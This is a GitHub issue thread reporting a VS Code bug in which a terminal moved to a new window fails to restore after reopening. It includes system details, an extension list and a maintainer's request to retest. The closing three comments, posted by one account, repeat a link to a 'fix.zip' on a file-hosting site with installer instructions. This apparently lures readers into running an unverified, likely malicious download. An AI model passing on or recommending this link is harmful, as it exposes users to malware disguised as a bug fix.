### ISSUE TITLE
terminal in new window reopen vscode

### ISSUE THREAD

**Issue by bitramsas** [microsoft/vscode#226473]
Type: <b>Bug</b>

1. Open vscode.
2. Create new terminal integrate.
3. Move to terminal to new window.
4. Close and reopen vscode.
5. Open terminal in new window in restore terminals.

not restore state terminal and generate is error:

No se pudo abrir el editor debido a un error inesperado: Not allowed to create elements in child window JavaScript context. Always use the main window so that "xyz instanceof HTMLElement" continues to work.

VS Code version: Code 1.92.2 (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Linux x64 6.1.0-23-amd64
Modes:
Remote OS version: Linux x64 6.1.0-23-amd64

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|Intel(R) Core(TM) i5-8400 CPU @ 2.80GHz (6 x 3799)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: enabled_on<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: disabled_software<br>vulkan: disabled_off<br>webgl: enabled<br>webgl2: enabled<br>webgpu: disabled_off<br>webnn: disabled_off|
|Load (avg)|0, 1, 0|
|Memory (System)|31.28GB (26.46GB free)|
|Process Argv|--crash-reporter-id 4e491d8a-2bc2-4acf-901a-3bbd2146163c|
|Screen Reader|no|
|VM|0%|
|DESKTOP_SESSION|gnome|
|XDG_CURRENT_DESKTOP|GNOME|
|XDG_SESSION_DESKTOP|gnome|
|XDG_SESSION_TYPE|x11|

|Item|Value|
|---|---|
|Remote|SSH: 192.168.7.7|
|OS|Linux x64 6.1.0-23-amd64|
|CPUs|Common KVM processor (16 x 0)|
|Memory (System)|19.53GB (10.88GB free)|
|VM|0%|
</details><details><summary>Extensions (47)</summary>

Extension|Author (truncated)|Version
---|---|---
better-comments|aar|3.0.2
vsc-python-indent|Kev|1.18.0
jupyter-keymap|ms-|1.1.2
remote-ssh|ms-|0.113.1
remote-ssh-edit|ms-|0.86.0
remote-explorer|ms-|0.4.3
better-comments|aar|3.0.2
vscode-color|ans|0.4.5
All-Autocomplete|Ati|0.0.26
jsoncrack-vscode|Ayk|2.0.3
markdown-checkbox|bie|0.4.0
markdown-mermaid|bie|1.23.1
codeium|Cod|1.12.6
dbclient-jdbc|cwe|1.3.5
vscode-postgresql-client2|cwe|7.5.7
githistory|don|0.6.20
xml|Dot|2.5.1
gitlens|eam|15.3.1
vscode-html-css|ecm|2.0.10
vscode-diff|fab|2.1.2
todo-tree|Gru|0.0.226
vscode-test-explorer|hbe|2.21.1
svgeditor|hen|2.9.0
comment-translate|int|2.3.3
vsc-python-indent|Kev|1.18.0
vscode-python-test-adapter|lit|0.8.2
rainbow-csv|mec|3.12.0
simple-autocomplete|mks|1.1.3
vscode-language-pack-es|MS-|1.92.2024081409
autopep8|ms-|2024.0.0
debugpy|ms-|2024.10.0
python|ms-|2024.12.3
vscode-pylance|ms-|2024.8.1
jupyter|ms-|2024.7.0
jupyter-keymap|ms-|1.1.2
jupyter-renderers|ms-|1.0.19
vscode-jupyter-cell-tags|ms-|0.1.9
vscode-jupyter-slideshow|ms-|0.1.6
test-adapter-converter|ms-|0.1.9
autodocstring|njp|0.6.1
vscode-git-flow|Psy|0.5.1
vscode-xml|red|0.27.1
trailing-spaces|sha|0.4.1
intellicode-api-usage-examples|Vis|0.2.8
vscodeintellicode|Vis|1.3.1
vscode-wakatime|Wak|24.6.0
json|Zai|2.0.2

</details><details>
<summary>A/B Experiments</summary>

```
vsliv368:30146709
vspor879:30202332
vspor708:30202333
vspor363:30204092
vscod805:30301674
binariesv615:30325510
vsaa593:30376534
py29gd2263:31024239
c4g48928:30535728
azure-dev_surveyone:30548225
2i9eh265:30646982
962ge761:30959799
pythongtdpath:30769146
pythonnoceb:30805159
asynctok:30898717
pythonregdiag2:30936856
pythonmypyd1:30879173
h48ei257:31000450
pythontbext0:30879054
dsvsc016:30899300
dsvsc017:30899301
dsvsc018:30899302
cppperfnew:31000557
dsvsc020:30976470
pythonait:31006305
dsvsc021:30996838
da93g388:31013173
pythoncenvpt:31062603
a69g1124:31058053
dvdeprecation:31068756
dwnewjupyter:31046869
impr_priority:31102340
refactort:31108082
pythonrstrctxt:31112756
flightc:31119335
wkspc-onlycs-t:31111718
wkspc-ranged-t:31123313
ei213698:31121563

```

</details>

**Comment by meganrogge** [comment]
I believe this is already fixed, can you see if you can reproduce in the [Insiders build](https://code.visualstudio.com/insiders)?
/label info-needed

**Comment by bitramsas** [comment]
yes [Insiders build](https://code.visualstudio.com/insiders)] is installed

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
